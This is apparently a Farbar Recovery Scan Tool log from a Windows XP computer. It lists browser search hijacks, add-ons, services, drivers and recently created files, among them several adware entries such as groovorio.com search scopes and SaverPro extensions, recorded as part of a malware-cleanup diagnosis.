SearchScopes: HKLM - {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
SearchScopes: HKCU - DefaultScope {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
SearchScopes: HKCU - {8E20B32C-2985-498A-9825-EC35F6F21877} URL = http://search.yahoo.com/search?fr=chr-greentree_ie&ei=utf-8&ilc=12&type=994519_yserp3tst&p={searchTerms}
SearchScopes: HKCU - {9BB47C17-9C68-4BB3-B188-DD9AF0FD2516} URL = http://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p={searchTerms}
SearchScopes: HKCU - {CC865B26-C31D-4D23-B17B-96548EEF03F6} URL = http://groovorio.com/results.php?f=4&q={searchTerms}&a=grv_tuto1_14_30&cd=2XzuyEtN2Y1L1QzutDtDtCzytBtCyDyC0CzzyBtC0Ezy0AtAtN0D0Tzu0SzyyDtAtN1L2XzutBtFtBtCtFtCzztFtAtN1L1Czu1N1C2X1V2Z2Y2Z1FtC1VtCyE1VtAtDtN1L1G1B1V1N2Y1L1Qzu2StD0CtCzyyE0DzzzztG0FtCyBzztGzz0E0EzztGtCyD0AtDtGtCzytA0B0D0Ezz0Ezz0A0CtC2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyE0CyCtA0A0AzyzytGtD0DyBtAtG0CyCyDtAtG0A0ByDzztGtCtByBzz0C0EyEyB0BtC0FtC2Q&cr=752508404&ir=
BHO: HP Print Enhancer -> {0347C33E-8762-4905-BF09-768834316C61} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_printenhancer.dll (Hewlett-Packard Co.)
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: avast! WebRep -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: SaverPro -> {B1C50D68-A112-A194-98C5-6E673EC9E3A8} -> C:\Documents and Settings\All Users\Application Data\SaverPro\HeV0cV.dll No File
BHO: MSN Toolbar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKLM - Acer eDataSecurity Management - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
Toolbar: HKLM - MSN Toolbar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - avast! WebRep - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
DPF: {0E5F0222-96B9-11D3-8997-00104BD12D94} http://pcpitstop.com/pcpitstop/PCPitStop.CAB
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} http://gfx1.mail.live.com/mail/w1/resources/MSNPUpld.cab
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: {CAFEEFAC-0015-0000-0006-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
ShellExecuteHooks: SABShellExecuteHook Class - {5AE067D3-9AFB-48E0-853A-EBB7F4A000DA} - C:\Program Files\SUPERAntiSpyware\SASSEH.DLL [113024 2011-07-18] (SuperAdBlocker.com)
Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 69.144.127.53 68.116.46.115 71.9.127.107

FireFox:
========
FF ProfilePath: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default
FF DefaultSearchEngine: default-search.net
FF SearchEngineOrder.1: default-search.net
FF SelectedSearchEngine: default-search.net
FF Homepage: hxxp://www.google.com/
FF Keyword.URL: hxxp://www.default-search.net/search?sid=516&aid=104&itype=n&ver=13539&tm=436&src=ds&p=
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/MycameraPlugin -> C:\Program Files\Canon\ZoomBrowser EX\Program\NPCIG.dll (CANON INC.)
FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @Microsoft.com/NpWinExt,version=4.0 -> C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\npwinext.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @nsroblox.roblox.com/launcher -> C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\\NPRobloxProxy.dll ( ROBLOX Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll (Apple Inc.)
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\default-search.xml
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\Groovorio.xml
FF SearchPlugin: C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\searchplugins\utorrentcontrolv2-customized-web-search.xml
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\default-search.xml
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\istart123.xml
FF Extension: Linkey for Firefox - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\extension@linkeyproject.com [2014-08-10]
FF Extension: Move Media Player - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\moveplayer@movenetworks.com [2009-04-04]
FF Extension: SaverPro - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\oilf@xavpaie.edu [2014-08-10]
FF Extension: SupraSavings - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\j003-lqgrmgpcekslhg@jetpack.xpi [2014-07-11]
FF Extension: Torrent Finder Toolbar - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\TFToolbarX@torrent-finder.xpi [2012-10-03]
FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi [2012-02-14]
FF Extension: Java Console - C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA} [2014-08-10]
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-22]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011-09-19]
FF HKLM\...\Firefox\Extensions: [msntoolbar@msn.com] - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox
FF Extension: MSN Toolbar - C:\Program Files\MSN Toolbar\Platform\4.0.0357.1\Firefox [2011-09-19]
FF HKLM\...\Firefox\Extensions: [{27182e60-b5f3-411c-b545-b44205977502}] - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension
FF Extension: Search Helper Extension - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\firefoxextension\SearchHelperExtension [2011-09-21]
FF HKLM\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2011-09-05]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3

Chrome:
=======
CHR HomePage: hxxp://www.google.com/
CHR StartupUrls: "hxxp://wwww.google.com/"
CHR Extension: (Google Drive) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-03-21]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-23]
CHR Extension: (YouTube) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-03-21]
CHR Extension: (Google Search) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-03-21]
CHR Extension: (Video Pinner) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\egfhbaheiflmihggjcfmnmchkijkcdpl [2014-08-10]
CHR Extension: (Linkey) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fpmeembnagmagppkgghhfjfdfajdfcah [2014-08-10]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-09]
CHR Extension: (Gmail) - C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-03-21]
CHR HKLM\...\Chrome\Extension: [fpmeembnagmagppkgghhfjfdfajdfcah] - C:\Documents and Settings\Jay\Local Settings\Application Data\Linkey\ChromeExtension\ChromeExtension.crx [2014-08-10]
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE.EXE [116608 2011-08-11] (SUPERAntiSpyware.com) [File not signed]
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [46808 2013-05-09] (AVAST Software)
R2 avast! Firewall; C:\Program Files\AVAST Software\Avast\afwServ.exe [137960 2013-05-09] (AVAST Software)
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182184 2013-07-20] (Oracle Corporation)
S3 MozillaMaintenance; C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe [119408 2014-08-10] (Mozilla Foundation) [File not signed]
R2 Net Driver HPZ12; C:\WINDOWS\system32\HPZinw12.dll [44032 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.dll [53760 2010-08-06] (Hewlett-Packard) [File not signed]
R2 SmdmFService; C:\Program Files\Settings Manager\smdmf\SmdmFService.exe [3572240 2014-07-28] (Aztec Media Inc) [File not signed]
S3 SupportSoft RemoteAssist; C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe [394608 2008-01-08] (SupportSoft, Inc.)
S4 Amazon Download Agent; C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderService.exe [X]
S4 Automatic LiveUpdate Scheduler; "C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe" [X]
S2 IntuitUpdateService; "C:\Program Files\Common Files\Intuit\Update Service\IntuitUpdateService.exe" [X]
S2 LightScribeService; "c:\Program Files\Common Files\LightScribe\LSSrvc.exe" [X]
S4 LiveUpdate; "C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE" [X]
S2 sprtlisten; C:\Program Files\Common Files\supportsoft\bin\sprtlisten.exe /identity QUICKASSIST    [X]
S4 Symantec Core LC; "C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe" [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 aswFsBlk; C:\WINDOWS\system32\Drivers\aswFsBlk.sys [29816 2013-05-09] (AVAST Software)
R1 aswFW; C:\WINDOWS\system32\Drivers\aswFW.sys [104752 2013-05-09] (AVAST Software)
R0 aswKbd; C:\WINDOWS\system32\Drivers\aswKbd.sys [21576 2013-05-09] (AVAST Software)
R2 aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [66336 2013-05-09] (AVAST Software)
R0 aswNdis; C:\WINDOWS\System32\DRIVERS\aswNdis.sys [12112 2011-07-04] (ALWIL Software)
R0 aswNdis2; C:\WINDOWS\system32\Drivers\aswNdis2.sys [204784 2013-05-09] (AVAST Software)
R1 aswRdr; C:\WINDOWS\system32\Drivers\aswRdr.sys [49760 2013-05-09] (AVAST Software)
R0 aswRvrt; C:\WINDOWS\system32\Drivers\aswRvrt.sys [49376 2013-05-09] ()
R1 aswSnx; C:\WINDOWS\system32\Drivers\aswSnx.sys [770344 2013-06-30] (AVAST Software)
R1 aswSP; C:\WINDOWS\system32\Drivers\aswSP.sys [369584 2013-06-30] (AVAST Software)
R1 aswTdi; C:\WINDOWS\system32\Drivers\aswTdi.sys [56080 2013-05-09] (AVAST Software)
R0 aswVmm; C:\WINDOWS\system32\Drivers\aswVmm.sys [175176 2013-06-30] ()
R1 eeCtrl; C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys [376480 2012-07-29] (Symantec Corporation)
R1 F06DEFF2-5B9C-490D-910F-35D3A9119622; C:\Program Files\Settings Manager\smdmf\smdmfmgrc2.cfg [34192 2014-07-28] (Aztec Media Inc) [File not signed]
R3 HPZid412; C:\WINDOWS\System32\DRIVERS\HPZid412.sys [49920 2009-08-05] (HP)
R3 HPZipr12; C:\WINDOWS\System32\DRIVERS\HPZipr12.sys [16496 2009-08-05] (HP)
R3 HPZius12; C:\WINDOWS\System32\DRIVERS\HPZius12.sys [21568 2009-08-05] (HP)
R1 netfilter; C:\WINDOWS\System32\drivers\netfilter.sys [47488 2014-07-11] (NetFilterSDK.com) [File not signed]
R3 NTIDrvr; C:\WINDOWS\System32\DRIVERS\NTIDrvr.sys [6144 2006-07-19] (NewTech Infosystems, Inc.) [File not signed]
R3 psdfilter; C:\WINDOWS\system32\Drivers\psdfilter.sys [12288 2006-04-07] (HiTRUST) [File not signed]
R3 psdvdisk; C:\WINDOWS\system32\Drivers\psdvdisk.sys [60416 2006-03-08] (HiTRUST) [File not signed]
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS [12880 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS [67664 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R2 symlcbrd; C:\WINDOWS\system32\drivers\symlcbrd.sys [10344 2007-04-18] (Symantec Corporation)
R0 UBHelper; C:\WINDOWS\system32\Drivers\UBHelper.sys [13952 2004-12-16] () [File not signed]
R3 yukonwxp; C:\WINDOWS\System32\DRIVERS\yk51x86.sys [244864 2006-06-28] (Marvell)
S3 ZD1211BU(ZyDAS); C:\WINDOWS\System32\DRIVERS\zd1211Bu.sys [402432 2005-10-28] (ZyDAS Technology Corporation)
S3 ZD1211U(ZyDAS); C:\WINDOWS\System32\DRIVERS\zd1211u.sys [280064 2005-10-04] (ZyDAS Technology Corporation)
R3 ZDPSp50; C:\WINDOWS\System32\Drivers\ZDPSp50.sys [17664 2004-10-25] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 06624408; No ImagePath
S3 catchme; \??\C:\combofix\catchme.sys [X]
S4 IntelIde; No ImagePath
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
S1 ssnfd; system32\drivers\ssnfd.sys [X]

==================== NetSvcs (Whitelisted) ===================


(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-21 21:35 - 2014-08-21 21:35 - 00000000 ____D () C:\FRST
2014-08-21 21:31 - 2014-08-21 21:31 - 00000000 ____D () C:\WINDOWS\LastGood
2014-08-18 22:58 - 2014-08-18 22:58 - 00000000 ____D () C:\4ea9f4d50c4d13298e29e45991c07f
2014-08-18 22:57 - 2014-08-18 22:57 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2770660$
2014-08-18 22:56 - 2014-08-18 22:56 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2850869$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2876331$
2014-08-18 22:55 - 2014-08-18 22:55 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2859537$
2014-08-18 22:54 - 2014-08-18 22:55 - 00136378 _____ () C:\WINDOWS\KB2807986.log
2014-08-18 22:54 - 2014-08-18 22:54 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2807986$
2014-08-18 22:44 - 2014-08-10 19:33 - 00000027 _____ () C:\WINDOWS\system32\Drivers\etc\hosts.20140818-224430.backup
2014-08-18 22:43 - 2014-08-18 22:43 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2868038$
2014-08-18 22:42 - 2014-08-18 22:43 - 00133967 _____ () C:\WINDOWS\KB2868038.log
2014-08-18 22:41 - 2014-08-18 22:41 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2820917$
2014-08-18 22:37 - 2014-08-18 22:37 - 00133872 _____ () C:\WINDOWS\KB2603381.log
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2893294$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2757638$
2014-08-18 22:37 - 2014-08-18 22:37 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2603381$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2749655$
2014-08-18 22:35 - 2014-08-18 22:35 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2653956$
2014-08-18 22:32 - 2014-08-18 22:32 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2892075$
2014-08-18 22:31 - 2014-08-18 22:32 - 00013937 _____ () C:\WINDOWS\KB2698365.log
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2698365$
2014-08-18 22:31 - 2014-08-18 22:31 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2619339$
2014-08-18 22:30 - 2014-08-18 22:30 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2705219-v2$
2014-08-18 22:25 - 2014-08-18 22:25 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2727528$
2014-08-18 22:24 - 2014-08-18 22:25 - 00012472 _____ () C:\WINDOWS\KB2723135-v2.log
2014-08-18 22:24 - 2014-08-18 22:24 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2723135-v2$
2014-08-18 22:23 - 2014-08-18 22:23 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2862330$
2014-08-18 22:18 - 2014-08-18 22:18 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2813345$
2014-08-18 22:14 - 2014-08-18 22:14 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2676562$
2014-08-18 21:42 - 2014-08-18 21:42 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2620712$
2014-08-18 21:40 - 2014-08-18 21:40 - 00008357 _____ () C:\WINDOWS\KB2914368.log
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2914368$
2014-08-18 21:40 - 2014-08-18 21:40 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2584146$
2014-08-17 12:54 - 2014-08-17 21:42 - 00015602 _____ () C:\Documents and Settings\Jay\Desktop\Stock Tracker.xlsx
2014-08-17 12:54 - 2014-08-17 12:54 - 00000165 ____H () C:\Documents and Settings\Jay\Desktop\~$Stock Tracker.xlsx
2014-08-17 12:01 - 2014-08-21 12:47 - 00011954 _____ () C:\WINDOWS\KB2916036.log
2014-08-17 12:01 - 2014-08-21 12:47 - 00011952 _____ () C:\WINDOWS\KB2922229.log
2014-08-17 12:01 - 2014-08-21 12:47 - 00011944 _____ () C:\WINDOWS\KB2868626.log
2014-08-17 12:00 - 2014-08-21 21:32 - 00011864 _____ () C:\WINDOWS\KB2929961.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00086464 _____ () C:\WINDOWS\KB2936068-IE7.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011944 _____ () C:\WINDOWS\KB2847311.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011867 _____ () C:\WINDOWS\KB2898715.log
2014-08-17 12:00 - 2014-08-21 12:46 - 00011779 _____ () C:\WINDOWS\KB2802968.log
2014-08-17 12:00 - 2014-08-21 12:45 - 00012862 _____ () C:\WINDOWS\KB2909212.log
2014-08-17 11:59 - 2014-08-21 12:39 - 00011708 _____ () C:\WINDOWS\KB2780091.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00012559 _____ () C:\WINDOWS\KB2930275.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011815 _____ () C:\WINDOWS\KB2862152.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011785 _____ () C:\WINDOWS\KB2876217.log
2014-08-17 11:40 - 2014-08-21 12:38 - 00011779 _____ () C:\WINDOWS\KB2864063.log
2014-08-17 11:40 - 2014-08-18 22:56 - 00142501 _____ () C:\WINDOWS\KB2850869.log
2014-08-17 11:40 - 2014-08-18 22:55 - 00141957 _____ () C:\WINDOWS\KB2876331.log
2014-08-17 11:39 - 2014-08-18 22:55 - 00142756 _____ () C:\WINDOWS\KB2859537.log
2014-08-17 11:39 - 2014-08-18 22:42 - 00142864 _____ () C:\WINDOWS\KB2820917.log
2014-08-17 11:39 - 2014-08-18 22:37 - 00141918 _____ () C:\WINDOWS\KB2757638.log
2014-08-17 11:39 - 2014-08-18 22:37 - 00139690 _____ () C:\WINDOWS\KB2893294.log
2014-08-17 11:39 - 2014-08-18 22:35 - 00142032 _____ () C:\WINDOWS\KB2749655.log
2014-08-17 11:39 - 2014-08-18 22:32 - 00018123 _____ () C:\WINDOWS\KB2892075.log
2014-08-17 11:39 - 2014-08-18 22:30 - 00020643 _____ () C:\WINDOWS\KB2705219-v2.log
2014-08-17 11:39 - 2014-08-18 22:25 - 00019333 _____ () C:\WINDOWS\KB2727528.log
2014-08-17 11:38 - 2014-08-21 21:32 - 00010910 _____ () C:\WINDOWS\KB2691442.log
2014-08-17 11:38 - 2014-08-21 21:32 - 00010850 _____ () C:\WINDOWS\KB2719985.log
2014-08-17 11:38 - 2014-08-21 12:47 - 00011022 _____ () C:\WINDOWS\KB2712808.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00011131 _____ () C:\WINDOWS\KB2655992.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010938 _____ () C:\WINDOWS\KB2585542.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010691 _____ () C:\WINDOWS\KB2631813.log
2014-08-17 11:38 - 2014-08-21 12:46 - 00010600 _____ () C:\WINDOWS\KB2598479.log
2014-08-17 11:37 - 2014-08-18 22:35 - 00139623 _____ () C:\WINDOWS\KB2653956.log
2014-08-17 11:37 - 2014-08-18 22:31 - 00019056 _____ () C:\WINDOWS\KB2619339.log
2014-08-17 11:30 - 2014-08-18 22:19 - 00019733 _____ () C:\WINDOWS\KB2813345.log
2014-08-17 11:30 - 2014-08-18 22:15 - 00021923 _____ () C:\WINDOWS\KB2676562.log
2014-08-17 11:28 - 2014-08-18 21:43 - 00017799 _____ () C:\WINDOWS\KB2620712.log
2014-08-17 11:25 - 2014-08-18 21:40 - 00016947 _____ () C:\WINDOWS\KB2584146.log
